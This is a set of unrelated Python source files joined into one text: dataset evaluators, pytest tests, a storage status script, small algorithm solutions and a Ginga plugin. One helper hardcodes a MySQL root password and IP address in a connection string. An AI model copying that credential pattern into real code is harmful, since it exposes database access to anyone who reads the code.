# 4) evaluate the predictions
results = metric.compute(predictions=predictions, references=references)
return results
class MultipleChoice_QA_Dataset(QA_Dataset):
def __init__(self, dataset_name) -> None:
super().__init__(dataset_name)
def evaluate(self, dict_qid2prediction) -> dict:
'''
Input: dict_qid2prediction: dict of qid to prediction (str)
Metric: accuracy
Output: {'accuracy': value}
'''
# 1) Load accuracy metric
accuracy_metric = load_metric("accuracy")
predictions = []
references = []
# 2) convert the string predictions to idx predictions
for qid, prediction in dict_qid2prediction.items():
# 3) find the most similar option using f1_score
options = self.get_list_options(qid)
list_scores = []
for opt in options:
list_scores.append(super().f1_score(prediction, opt))
# 3.1) find the index of the max score
max_score_idx = list_scores.index(max(list_scores))
predictions.append(max_score_idx)
# 4) add the golden label
references.append(self._dict_qid2ans_idx[qid])
results = accuracy_metric.compute(references=references, predictions=predictions)
results['accuracy'] = results['accuracy'] * 100
return results
class RACE_Dataset(MultipleChoice_QA_Dataset):
def __init__(self, config, split) -> None:
super().__init__('RACE')
full_data = load_dataset('race', config)
data = full_data[split]
lbl_map = {'A': 0, 'B': 1, 'C': 2, 'D': 3}
for i, x in enumerate(data):
qid = x['example_id'] + "-" + str(i)
q = x['question'].replace("?", "").lower().strip()
if q == "":
continue
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
ans_idx = lbl_map[x['answer']]
ans_txt = x['options'][ans_idx]
self._dict_qid2list_answer_labels[qid] = [ans_txt]
self._dict_qid2list_options[qid] = x["options"]
self._dict_qid2ans_idx[qid] = ans_idx
class CommonSenseQA_Dataset(MultipleChoice_QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('CommonSenseQA')
full_data = load_dataset('commonsense_qa')
data = full_data[split]
lbl_map = {'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4}
for i, x in enumerate(data):
qid = "csqa-"+str(i)
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
ans_letter = x['answerKey']
ans_idx = lbl_map[ans_letter]
ans_txt = x['choices']['text'][ans_idx]
self._dict_qid2list_answer_labels[qid] = [ans_txt]
self._dict_qid2list_options[qid] = x['choices']['text']
self._dict_qid2ans_idx[qid] = ans_idx
class HellaSWAG_Dataset(MultipleChoice_QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('HellaSWAG')
full_data = load_dataset('hellaswag')
data = full_data[split]
for i, x in enumerate(data):
qid = "HellaSWAG-"+str(i)
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['ctx']
ans_idx = int(x['label'])
ans_txt = x['endings'][ans_idx]
self._dict_qid2list_answer_labels[qid] = [ans_txt]
self._dict_qid2list_options[qid] = x['endings']
self._dict_qid2ans_idx[qid] = ans_idx
class SIQA_Dataset(MultipleChoice_QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('SIQA')
full_data = load_dataset('social_i_qa')
data = full_data[split]
for i, x in enumerate(data):
qid = "SIQA-"+str(i)
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
ans_idx = int(x['label']) - 1 #originally starts at 1
list_choices = [x['answerA'], x['answerB'], x['answerC']]
ans_txt = list_choices[ans_idx]
self._dict_qid2list_answer_labels[qid] = [ans_txt]
self._dict_qid2list_options[qid] = list_choices
self._dict_qid2ans_idx[qid] = ans_idx
class BoolQ_Dataset(MultipleChoice_QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('BoolQ')
full_data = load_dataset('boolq')
data = full_data[split]
for i, x in enumerate(data):
qid = "BoolQ-"+str(i)
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
self._dict_qid2list_answer_labels[qid] = ['True'] if x['answer'] else ['False']
self._dict_qid2list_options[qid] = ['False', 'True']
self._dict_qid2ans_idx[qid] = 1 if x['answer'] else 0
class DROP_Dataset(QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('DROP')
full_data = load_dataset("drop")
data = full_data[split]
for i, x in enumerate(data):
qid = x['query_id']
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
self._dict_qid2list_answer_labels[qid] = x['answers_spans']['spans']
def evaluate(self, dict_qid2prediction) -> dict:
'''
Input: dict_qid2prediction: dict of qid (str) to prediction (str)
Output: {'exact_match': value, 'f1': value}
'''
# 1) load the metric
metric = load_metric('squad')
# 2) get the list of labels in the format of the squad metric
references = []
set_qids = set()
for qid in self.list_qids:
# drop has a duplicated qid for some reason, so we need to remove it because
# it's not duplicated in the predictions
if qid not in set_qids:
ref = {'id': qid , 'answers': {'text': [], 'answer_start': []}}
for ans in self.get_list_answer_label(qid):
ref['answers']['text'].append(ans)
ref['answers']['answer_start'].append(0)
references.append(ref)
set_qids.add(qid)
# 3) get the predictions in the format of the squad metric
predictions = [{'id': qid, 'prediction_text': pred} for qid, pred in dict_qid2prediction.items()]
# 4) evaluate the predictions
results = metric.compute(predictions=predictions, references=references)
return results
class NarrativeQA_Dataset(QA_Dataset):
def __init__(self, datapath) -> None:
'''
The input format is the same as in UnifiedQA
'''
super().__init__('NarrativeQA')
path = os.path.join(datapath, 'abstractive', 'narrativeqa.tsv')
self.df = pd.read_csv(path, sep='\t', names=['x', 'y'])
self.dict_instance2list_linenum = {}
for i, l in enumerate(self.df['x'].tolist()):
if l not in self.dict_instance2list_linenum:
self.dict_instance2list_linenum[l] = []
self.dict_instance2list_linenum[l].append(i)
self.golds = []
for l in self.df['y'].tolist():
self.golds.append(l.strip())
for i, (x, list_linenum) in enumerate(self.dict_instance2list_linenum.items()):
qid = 'NarrativeQA-'+str(i)
self.list_qids.append(qid)
self._dict_qid2question[qid] = x.split('\\n')[0].strip()
list_ans = [self.golds[i] for i in list_linenum]
self._dict_qid2list_answer_labels[qid] = list_ans
def evaluate(self, dict_qid2pred):
'''
Adapted from https://github.com/allenai/unifiedqa/blob/master/evaluation/evaluate_narrativeqa.py
'''
scorer = rouge_scorer.RougeScorer(['rougeL'], use_stemmer=True)
list_scores = []
for qid in self.list_qids:
# 1) get str prediction
pred = dict_qid2pred[qid]
# 2) get list of labels
list_lbls = self.get_list_answer_label(qid)
# 3) compute best pred-lbl score
score = self.__metric_max_over_ground_truths(pred, list_lbls, scorer)
# 4) append score to compute the average
list_scores.append(score)
return {'RougeL': 100.0 * sum(list_scores) / len(list_scores)}
def __metric_max_over_ground_truths(self, prediction, ground_truths, metric_fn):
'''
From on https://github.com/allenai/unifiedqa/blob/master/evaluation/evaluate_narrativeqa.py
'''
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn.score(prediction, ground_truth)['rougeL'].fmeasure
scores_for_ground_truths.append(score)
return round(max(scores_for_ground_truths), 2)
class HybridQA_Dataset(QA_Dataset):
def __init__(self, split, list_qids=None) -> None:
super().__init__('HybridQA')
full_data = load_dataset("hybrid_qa")
data = full_data[split]
for x in data:
qid = x['question_id']
if (list_qids is None) or (list_qids is not None and qid in list_qids):
self.list_qids.append(qid)
self._dict_qid2question[qid] = x['question']
self._dict_qid2list_answer_labels[qid] = [x['answer_text']]
def evaluate(self, dict_qid2prediction) -> dict:
'''
Input: dict_qid2prediction: dict of qid (str) to prediction (str)
Output: {'exact_match': value, 'f1': value}
'''
# 1) load the metric
metric = load_metric('squad')
# 2) get the list of labels in the format of the squad metric
references = []
for qid in self.list_qids:
ref = {'id': qid , 'answers': {'text': [], 'answer_start': []}}
for ans in self.get_list_answer_label(qid):
ref['answers']['text'].append(ans)
ref['answers']['answer_start'].append(0)
references.append(ref)
# 3) get the predictions in the format of the squad metric
predictions = [{'id': qid, 'prediction_text': pred} for qid, pred in dict_qid2prediction.items()]
# 4) evaluate the predictions
results = metric.compute(predictions=predictions, references=references)
return results
class List_QA_Datasets(QA_Dataset):
def __init__(self, list_datasets, dataset_name, shuffle) -> None:
super().__init__(dataset_name)
self.__dict_qid2dataset_name = dict()
self.dict_dataset_name2list_qids = dict()
list_features = []
# concatenate all datasets
for dataset in list_datasets:
list_features.extend([x for x in dataset])
self.dict_dataset_name2list_qids[dataset.dataset_name] = dataset.list_qids
for qid in dataset.list_qids:
self.__dict_qid2dataset_name[qid] = dataset.dataset_name
# shuffle
if shuffle:
random.shuffle(list_features)
# create the QA_Dataset
for x in list_features:
self.list_qids.append(x['qid'])
self._dict_qid2question[x['qid']] = x['question']
self._dict_qid2list_answer_labels[x['qid']] = x['answer_label']
def get_dataset_name(self, qid):
return self.__dict_qid2dataset_name[qid]
def get_list_datasets(self):
return list(self.dict_dataset_name2list_qids.keys())
| StarcoderdataPython |
1723668 | <reponame>satvidh/batch-scoring
import pytest
from datarobot_batch_scoring.api_response_handlers import pred_api_v10, api_v1
from datarobot_batch_scoring.consts import Batch
from datarobot_batch_scoring.exceptions import UnexpectedKeptColumnCount, \
NoPredictionThresholdInResult
@pytest.fixture()
def parsed_pred_api_v10_predictions():
return [
{
"predictionValues": [{"value": 1, "label": "readmitted"}],
"prediction": 1,
"predictionThreshold": 0.5,
"rowId": 0
},
{
"predictionValues": [{"value": 1, "label": "readmitted"}],
"prediction": 1,
"predictionThreshold": 0.5,
"rowId": 1
}]
@pytest.fixture()
def parsed_pred_api_v10_predictions_regression():
return [
{
"predictionValues": [{"value": 42.42, "label": "currency"}],
"prediction": 42.42,
"rowId": 0
},
{
"predictionValues": [{"value": 84.84, "label": "currency"}],
"prediction": 84.84,
"rowId": 1
}]
@pytest.fixture()
def parsed_api_v1_predictions():
return {
'model_id': '123',
'status': '',
'code': 200,
'execution_time': 100,
'task': 'Binary',
'version': 'v1',
'predictions': [{'class_probabilities': {'0.0': 0.4,
'1.0': 0.6},
'prediction': 1.0,
'row_id': 0},
{'class_probabilities': {'0.0': 0.6,
'1.0': 0.4},
'prediction': 0.0,
'row_id': 1}]
}
@pytest.fixture()
def batch():
return Batch(id=0,
fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
rows=2,
data=[
['Caucasian', 'Male', '[50-60)', '?', 'FALSE'],
['Caucasian', 'Male', '[50-60)', '?', 'TRUE']
],
rty_cnt=3)
@pytest.fixture()
def fast_batch_quoted_newline():
return Batch(id=0,
fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
rows=2,
data=[
'Caucasian,Male,[50-60),?,FALSE',
'Caucasian,Male,[50-60),?',
'TRUE'
],
rty_cnt=3)
@pytest.fixture()
def fast_batch_with_quoted_comma():
return Batch(id=0,
fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
rows=2,
data=[
'Caucasian,Male,[50-60),?,FALSE',
'Caucasian,Male,"[50,60)",?,TRUE'
],
rty_cnt=3)
class TestPredApiV10Handlers(object):
def test_unpack_data(self):
result = pred_api_v10.unpack_data({
'elapsed': 0.123,
'text': '''
{
"data": [{
"predictionValues": [{"value":5.0001011968,"label":"z"}],
"prediction":5.0001011968,
"rowId":0
},
{
"predictionValues": [{"value":5.0001011968,"label":"z"}],
"prediction":5.0001011968,
"rowId":0
}]
}
''',
'headers': {
'X-DataRobot-Execution-Time': 10
}
})
assert type(result) is tuple
data, exec_time, elapsed = result
assert len(data) == 2
assert elapsed == 0.123
assert exec_time == 10
@pytest.mark.parametrize('opts, expected_fields, expected_values', (
({'pred_name': None,
'pred_threshold_name': None,
'pred_decision_name': None,
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'readmitted'],
[[0, 1], [1, 1]]),
({'pred_name': None,
'pred_threshold_name': None,
'pred_decision_name': None,
'keep_cols': ['gender'],
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'gender', 'readmitted'],
[[0, 'Male', 1], [1, 'Male', 1]]),
({'pred_name': None,
'pred_threshold_name': None,
'pred_decision_name': None,
'keep_cols': ['gender'],
'skip_row_id': True,
'fast_mode': False,
'delimiter': ','},
['gender', 'readmitted'],
[['Male', 1], ['Male', 1]]),
({'pred_name': None,
'pred_threshold_name': 'threshold',
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'readmitted', 'threshold'],
[[0, 1, 0.5], [1, 1, 0.5]]),
({'pred_name': None,
'pred_decision_name': 'label',
'pred_threshold_name': None,
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'readmitted', 'label'],
[[0, 1, 1], [1, 1, 1]]),
({'pred_name': None,
'pred_decision_name': 'label',
'pred_threshold_name': 'threshold',
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'readmitted', 'threshold', 'label'],
[[0, 1, 0.5, 1], [1, 1, 0.5, 1]]),
))
def test_format_data(self, parsed_pred_api_v10_predictions, batch,
opts, expected_fields, expected_values):
fields, values = pred_api_v10.format_data(
parsed_pred_api_v10_predictions, batch, **opts)
assert fields == expected_fields
assert values == expected_values
@pytest.mark.parametrize('opts', [
{'pred_name': None,
'pred_threshold_name': 'threshold',
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
])
def test_fail_threshold_on_non_binary_classification(
self, parsed_pred_api_v10_predictions_regression,
batch, opts):
with pytest.raises(NoPredictionThresholdInResult):
pred_api_v10.format_data(
parsed_pred_api_v10_predictions_regression, batch, **opts)
class TestApiV1Handlers(object):
def test_unpack_data(self):
result = api_v1.unpack_data({
'elapsed': 0.123,
'text': '''
{"status": "",
"model_id": "598b07d8100d2b4b0cd39224",
"code": 200,
"execution_time": 10,
"predictions": [
{
"row_id": 0,
"class_probabilities":{"0.0":0.4,"1.0":0.6},
"prediction":1.0
},
{
"row_id": 1,
"class_probabilities":{"0.0":0.4,"1.0":0.6},
"prediction":1.0
}
]}
''',
'headers': {
'X-DataRobot-Model-Cache-Hit': 'true'
}
})
assert type(result) is tuple
data, exec_time, elapsed = result
assert type(data) is dict
assert set(data.keys()) == {
'status', 'model_id', 'code', 'execution_time', 'predictions'}
assert elapsed == 0.123
assert exec_time == 10
@pytest.mark.parametrize('opts, expected_fields, expected_values', (
({'pred_name': None,
'keep_cols': None,
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', '0.0', '1.0'],
[[0, 0.4, 0.6], [1, 0.6, 0.4]]),
({'pred_name': None,
'keep_cols': ['gender'],
'skip_row_id': False,
'fast_mode': False,
'delimiter': ','},
['row_id', 'gender', '0.0', '1.0'],
[[0, 'Male', 0.4, 0.6], [1, 'Male', 0.6, 0.4]]),
({'pred_name': None,
'keep_cols': ['gender'],
'skip_row_id': True,
'fast_mode': False,
'delimiter': ','},
['gender', '0.0', '1.0'],
[['Male', 0.4, 0.6], ['Male', 0.6, 0.4]]),
))
def test_format_data(self, parsed_api_v1_predictions, batch,
opts, expected_fields, expected_values):
fields, values = api_v1.format_data(
parsed_api_v1_predictions, batch, **opts)
assert fields == expected_fields
assert values == expected_values
@pytest.mark.parametrize('opts', [
{'pred_name': None,
'keep_cols': ['age'],
'skip_row_id': False,
'fast_mode': True,
'delimiter': ','}
])
def test_fail_on_quoted_newline_in_fast_mode(self,
parsed_api_v1_predictions,
fast_batch_quoted_newline,
opts):
with pytest.raises(UnexpectedKeptColumnCount):
api_v1.format_data(parsed_api_v1_predictions,
fast_batch_quoted_newline, **opts)
@pytest.mark.parametrize('opts', [
{'pred_name': None,
'keep_cols': ['age'],
'skip_row_id': False,
'fast_mode': True,
'delimiter': ','}
])
def test_fail_on_quoted_comma_in_fast_mode(self, parsed_api_v1_predictions,
fast_batch_with_quoted_comma,
opts):
with pytest.raises(UnexpectedKeptColumnCount):
api_v1.format_data(parsed_api_v1_predictions,
fast_batch_with_quoted_comma, **opts)
| StarcoderdataPython |
213759 | from time import sleep
from SillyStateMachine import SillyStateMachine
def check_list(correct_list, actual_list):
for x in range(0, len(correct_list) - 1):
assert correct_list[x] == actual_list[x]
class BasicStateMachine(SillyStateMachine):
"""Test child"""
def init_setup(self):
self.status = "I haven't started yet!"
self.States = {
"Start" : self._start_state,
"State 1" : self._state_1,
"State 2" : self._state_2,
"State 3" : self._state_3,
"Idle" : self._idle
}
self.interrupted = False
self.state_list = []
self.ret_list = []
def interrupt(self):
self.interrupted = True
self.state_list.append(self.next_state)
if self.prev_ret != None:
self.ret_list.append(self.prev_ret)
def stop_actions(self):
self.status = "Stopped!"
def reset_actions(self):
self.status = "Reset!"
def _start_state(self):
self.status = "I started!"
self.period = 0.002
self.next_state = "Start"
def _state_1(self, next = 2):
self.period = 0
if next == 2:
self.next_state = "State 2"
else:
self.next_state = "State 3"
def _state_2(self):
self.kwargs = {"next": 3}
self.next_state = "State 1"
return 2
def _state_3(self):
self.kwargs = {"next": 2}
self.next_state = "State 1"
return 3
def test_basic_init():
machine = BasicStateMachine()
assert machine.status == "I haven't started yet!"
assert machine.next_state == "Start"
assert machine.period == 0
assert machine.run_flag == False
assert machine.isRunning() == False
def test_basic_start_stop():
machine = BasicStateMachine()
machine.start()
assert machine.isRunning() == True
assert machine.getState() == "Start"
assert machine.next_state == "Start"
assert machine.status == "I started!"
assert machine.period == 0.002
assert machine.getPeriod() == 0.002
machine.stop()
assert machine.isRunning() == False
assert machine.status == "Stopped!"
def test_basic_reset():
machine = BasicStateMachine()
machine.setState("State 1")
machine.start()
machine.reset()
sleep(0.01)
assert machine.isRunning() == False
assert machine.getState() == "Start"
assert machine.status == "Reset!"
def test_basic_interrupt():
machine = BasicStateMachine()
machine.start()
sleep(machine.getPeriod())
assert machine.interrupted == True
machine.stop()
assert machine.isRunning() == False
def test_basic_kwargs_ret():
machine = BasicStateMachine()
machine.setState("State 1")
machine.start()
sleep(0.05)
machine.stop()
correct_call_list = [
"State 1",
"State 2",
"State 1",
"State 3",
"State 1",
"State 2",
"State 1",
"State 3",
"State 1",
"State 2",
"State 1",
"State 3",
"State 1",
"State 2",
"State 1",
"State 3",
]
actual_call_list = machine.state_list
check_list(correct_call_list, actual_call_list)
correct_ret_list = [
2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3,
]
actual_ret_list = machine.ret_list
check_list(correct_ret_list, actual_ret_list)
| StarcoderdataPython |
6500016 | <reponame>sppautomation/sppclient
# Script to check the status of vSnap provider(s) in SPP
# Use registervsnap.py -h for help
import json
import logging
from optparse import OptionParser
import sys
import spplib.sdk.client as client
logging.basicConfig()
logger = logging.getLogger('logger')
logger.setLevel(logging.INFO)
parser = OptionParser()
parser.add_option("--user", dest="username", help="SPP Username")
parser.add_option("--pass", dest="password", help="SPP Password")
parser.add_option("--host", dest="host", help="SPP Host, (ex. https://172.20.49.49)")
(options, args) = parser.parse_args()
def prettyprint(indata):
print(json.dumps(indata, sort_keys=True,indent=4, separators=(',', ': ')))
def validate_input():
if(options.username is None or options.password is None or options.host is None):
print("Invalid input, use -h switch for help")
sys.exit(2)
def get_vsnap_status():
try:
storages = client.SppAPI(session, 'corestorage').get()['storages']
if(len(storages) < 1):
print("No vSnap storage providers found")
session.logout()
sys.exit(2)
for storage in storages:
if(storage['type'] == "vsnap"):
print("vSnap provider " + storage['name'] + " is " + storage['initializeStatus'])
except:
print("Error connecting to SPP host")
validate_input()
session = client.SppSession(options.host, options.username, options.password)
session.login()
get_vsnap_status()
session.logout()
| StarcoderdataPython |
3561839 | <reponame>longwangjhu/LeetCode<gh_stars>1-10
# https://leetcode.com/problems/subtree-of-another-tree/
# Given the roots of two binary trees root and subRoot, return true if there is a
# subtree of root with the same structure and node values of subRoot and false
# otherwise.
# A subtree of a binary tree tree is a tree that consists of a node in tree and
# all of this node's descendants. The tree tree could also be considered as a
# subtree of itself.
################################################################################
# get preorder, use l_None and r_None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def isSubtree(self, s: TreeNode, t: TreeNode) -> bool:
return self.has_subtree(s, t)
s_preorder = self.preorder(s, True)
t_preorder = self.preorder(t, True)
return s_preorder.find(t_preorder) >= 0
def preorder(self, node, is_left):
if not node:
if is_left:
return 'l_None'
else:
return "r_None"
return "#" + str(node.val) + " " \
+ self.preorder(node.left, True) + " " \
+ self.preorder(node.right, False)
# treat every node in s as root, compare with t
def has_subtree(self, s, t):
if s is None:
return False
return self.is_same(s,t) \
or self.has_subtree(s.left, t) \
or self.has_subtree(s.right, t)
def is_same(self, s, t):
if s is None and t is None: return True # both are None
if s is None or t is None: return False # only one is None
return s.val == t.val \
and self.is_same(s.left, t.left) \
and self.is_same(s.right, t.right)
| StarcoderdataPython |
157905 | <reponame>cvahid/threatconnect-playbooks
# -*- coding: utf-8 -*-
"""ThreatConnect Playbook App"""
# Import default Playbook Class (Required)
from playbook_app import PlaybookApp
class App(PlaybookApp):
"""Playbook App"""
def run(self):
"""Run the App main logic.
This method should contain the core logic of the App.
"""
action = self.tcex.playbook.read(self.args.action)
domain = self.tcex.playbook.read(self.args.domain)
if action == 'decode':
self.updated_domain = domain.encode('idna').decode('utf-8')
elif action == 'encode':
self.updated_domain = domain.encode('utf-8').decode('idna')
self.exit_message = '{} has been {}ed to {}'.format(domain, action, self.updated_domain)
def write_output(self):
"""Write the Playbook output variables.
This method should be overridden with the output variables defined in the install.json
configuration file.
"""
self.tcex.log.info('Writing Output')
action = self.tcex.playbook.read(self.args.action)
if action == 'decode':
self.tcex.playbook.create_output('decodedDomain', self.updated_domain)
else:
self.tcex.playbook.create_output('encodedDomain', self.updated_domain)
| StarcoderdataPython |
352682 | <gh_stars>10-100
""""""
"""
==============
Binary Search
==============
TIme Complexity
Worst Case : O( log(n) )
Average Case : O( log(n) )
Best Case : O(1)
Space Complexity : O(1)
Binary Search is a sorting algorithm in which we select the mid element and compare key to the mid element if key is
smaller then we search before mid else after mid. If key is found we return the index of key else -1.
"""
import sys
class BinarySearch:
def binary_search(self, array, key):
low = 0
high = len(array) - 1
while low <= high:
mid = low + (high - low) // 2
if array[mid] == key:
return mid
elif array[mid] < key:
low = mid + 1
else:
high = mid - 1
return -1
if __name__ == "__main__":
print(
"""
==============
Binary Search
==============
Input Format
first line contains space separated sorted elements eg., 1 2 3 4 5 6 7 8 9
Second line contains the key to be searched eg., 7
"""
)
input = sys.stdin.read()
data = list(map(int, input.split()))
array = data[:-1]
key = data[-1]
res = BinarySearch().binary_search(array, key)
if res == -1:
print("Key not found")
else:
print("Key : '{}' found at index : {}".format(key, res + 1))
| StarcoderdataPython |
1625203 | from asynctest import TestCase as AsyncTestCase, mock as async_mock
from aries_cloudagent.indy.sdk.profile import IndySdkProfile
from ....askar.profile import AskarProfileManager
from ....config.injection_context import InjectionContext
from ....core.in_memory import InMemoryProfile
from ....indy.sdk.wallet_setup import IndyOpenWallet, IndyWalletConfig
from ....ledger.base import BaseLedger
from ....ledger.indy import IndySdkLedgerPool, IndySdkLedger
from ..base_manager import MultipleLedgerManagerError
from ..manager_provider import MultiIndyLedgerManagerProvider
TEST_GENESIS_TXN = {
"reqSignature": {},
"txn": {
"data": {
"data": {
"alias": "Node1",
"blskey": "<KEY>",
"blskey_pop": "<KEY>",
"client_ip": "192.168.65.3",
"client_port": 9702,
"node_ip": "192.168.65.3",
"node_port": 9701,
"services": ["VALIDATOR"],
},
"dest": "Gw6pDLhcBcoQesN72qfotTgFa7cbuqZpkX3Xo6pLhPhv",
},
"metadata": {"from": "Th7MpTaRZVRYnPiabds81Y"},
"type": "0",
},
"txnMetadata": {
"seqNo": 1,
"txnId": "fea82e10e894419fe2bea7d96296a6d46f50f93f9eeda954ec461b2ed2950b62",
},
"ver": "1",
}
LEDGER_CONFIG = [
{
"id": "sovrinStaging",
"is_production": True,
"is_write": True,
"genesis_transactions": TEST_GENESIS_TXN,
},
{
"id": "sovrinTest",
"is_production": False,
"genesis_transactions": TEST_GENESIS_TXN,
},
]
class TestMultiIndyLedgerManagerProvider(AsyncTestCase):
async def test_provide_invalid_manager(self):
profile = InMemoryProfile.test_profile()
provider = MultiIndyLedgerManagerProvider(profile)
context = InjectionContext()
context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
with self.assertRaises(MultipleLedgerManagerError):
provider.provide(context.settings, context.injector)
async def test_provide_indy_manager(self):
context = InjectionContext()
profile = IndySdkProfile(
IndyOpenWallet(
config=IndyWalletConfig({"name": "test-profile"}),
created=True,
handle=1,
master_secret_id="master-secret",
),
context,
)
context.injector.bind_instance(
BaseLedger, IndySdkLedger(IndySdkLedgerPool("name"), profile)
)
provider = MultiIndyLedgerManagerProvider(profile)
context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
context.settings["ledger.genesis_transactions"] = TEST_GENESIS_TXN
self.assertEqual(
provider.provide(context.settings, context.injector).__class__.__name__,
"MultiIndyLedgerManager",
)
async def test_provide_askar_manager(self):
context = InjectionContext()
profile = await AskarProfileManager().provision(
context,
{
# "auto_recreate": True,
# "auto_remove": True,
"name": ":memory:",
"key": await AskarProfileManager.generate_store_key(),
"key_derivation_method": "RAW", # much faster than using argon-hashed keys
},
)
context.injector.bind_instance(
BaseLedger, IndySdkLedger(IndySdkLedgerPool("name"), profile)
)
provider = MultiIndyLedgerManagerProvider(profile)
context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
context.settings["ledger.genesis_transactions"] = TEST_GENESIS_TXN
self.assertEqual(
provider.provide(context.settings, context.injector).__class__.__name__,
"MultiIndyVDRLedgerManager",
)
| StarcoderdataPython |
290135 | #!/usr/bin/env python3
########################################################################################################################
##### INFORMATION ######################################################################################################
### @PROJECT_NAME: SPLAT: Speech Processing and Linguistic Analysis Tool ###
### @VERSION_NUMBER: ###
### @PROJECT_SITE: github.com/meyersbs/SPLAT ###
### @AUTHOR_NAME: <NAME> ###
### @CONTACT_EMAIL: <EMAIL> ###
### @LICENSE_TYPE: MIT ###
########################################################################################################################
########################################################################################################################
"""
This package contains the following files:
[01] POSTagger.py
Provides the functionality to tokenize the given input with punctuation as separate tokens, and then does
a dictionary lookup to determine the part-of-speech for each token.
""" | StarcoderdataPython |
1609790 | # -*- coding:utf-8 -*-
"""
@author: leonardo
@created time: 2020-11-03
@last modified time:2020-11-03
"""
from sqlalchemy import create_engine,event
import numpy as np
def get_connection(database_name):
"""
:param database_name:
:return:
"""
return create_engine('mysql+pymysql://root:yangxh@192.168.127.12:3306/{}?charset=utf8'.format(database_name))
def add_own_encoders(conn, cursor, query, *args):
cursor.connection.encoders[np.float64] = lambda value, encoders: float(value)
cursor.connection.encoders[np.int32] = lambda value, encoders: int(value)
def enable_np_encoder(engine):
"""
py_mysql支持np.float64 translate
:param engine:
:return:
"""
event.listen(engine, "before_cursor_execute", add_own_encoders) | StarcoderdataPython |
3331804 | <filename>__main__.py
#!/usr/bin/env python
# import sys
import footmark
#from footmark.ecs.connection import ECSConnection
def main():
print "Hello World!"
if __name__== "__main__":
main()
print "This is main Program"
#app=ECSConnection()
#app.run()
| StarcoderdataPython |
6586771 | # This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
"""
Capture PNG or JPEG images of the channel viewer image.
**Usage**
1. Select the RGB graphics type for the snap from the "Type" combo box.
2. Press "Snap" when you have the channel image the way you want to capture it.
A copy of the RGB image will be loaded into the ``ScreenShot`` viewer.
You can pan and zoom within the ``ScreenShot`` viewer like a normal Ginga
viewer to examine detail (e.g., see the magnified difference between
JPEG and PNG formats).
3. Repeat (1) and (2) until you have the image you want.
4. Enter a valid path for a new file into the "Folder" text box.
5. Enter a valid name for a new file into the "Name" text box.
There is no need to add the file extension; it will be added, if needed.
6. Press the "Save" button. The file will be saved where you specified.
**Notes**
* PNG offers less artifacts for overlaid graphics, but files are larger
than JPEG.
* The "Center" button will center the snap image; "Fit" will set the
zoom to fit it to the window; and "Clear" will clear the image.
* Press "1" in the screenshot viewer to zoom to 100% pixels.
"""
import os.path
import shutil
import tempfile
from ginga import GingaPlugin
from ginga.RGBImage import RGBImage
from ginga.gw import Widgets, Viewers
__all__ = ['ScreenShot']
class ScreenShot(GingaPlugin.LocalPlugin):
def __init__(self, fv, fitsimage):
# superclass defines some variables for us, like logger
super(ScreenShot, self).__init__(fv, fitsimage)
self.tosave_type = 'png'
self.saved_type = None
self.savetypes = ('png', 'jpeg')
self.tmpname = os.path.join(tempfile.tempdir, "__snap")
self.save_path = ''
self.save_name = ''
self._wd = 200
self._ht = 200
def build_gui(self, container):
vbox = Widgets.VBox()
vbox.set_border_width(4)
vbox.set_spacing(2)
vbox1 = Widgets.VBox()
# Uncomment to debug; passing parent logger generates too
# much noise in the main logger
#zi = Viewers.CanvasView(logger=self.logger)
zi = Viewers.CanvasView(logger=None)
zi.set_desired_size(self._wd, self._ht)
zi.enable_autozoom('once')
zi.enable_autocuts('once')
zi.enable_autocenter('once')
zi.set_zoom_algorithm('step')
zi.cut_levels(0, 255)
zi.transform(False, True, False)
#zi.set_scale_limits(0.001, 1000.0)
zi.set_bg(0.4, 0.4, 0.4)
zi.set_color_map('gray')
zi.set_intensity_map('ramp')
# for debugging
zi.set_name('scrnimage')
self.scrnimage = zi
bd = zi.get_bindings()
bd.enable_zoom(True)
bd.enable_pan(True)
bd.enable_cmap(False)
zi.show_mode_indicator(True)
iw = Viewers.ScrolledView(zi)
iw.resize(self._wd, self._ht)
vbox1.add_widget(iw, stretch=1)
captions = (('Type:', 'label', 'grtype', 'combobox',
'Snap', 'button'),
('Clear', 'button', 'Center', 'button', 'Fit', 'button',
'Full', 'button'),
)
w, b = Widgets.build_info(captions, orientation='vertical')
self.w = b
combobox = b.grtype
for name in self.savetypes:
combobox.append_text(name)
index = self.savetypes.index(self.tosave_type)
combobox.set_index(index)
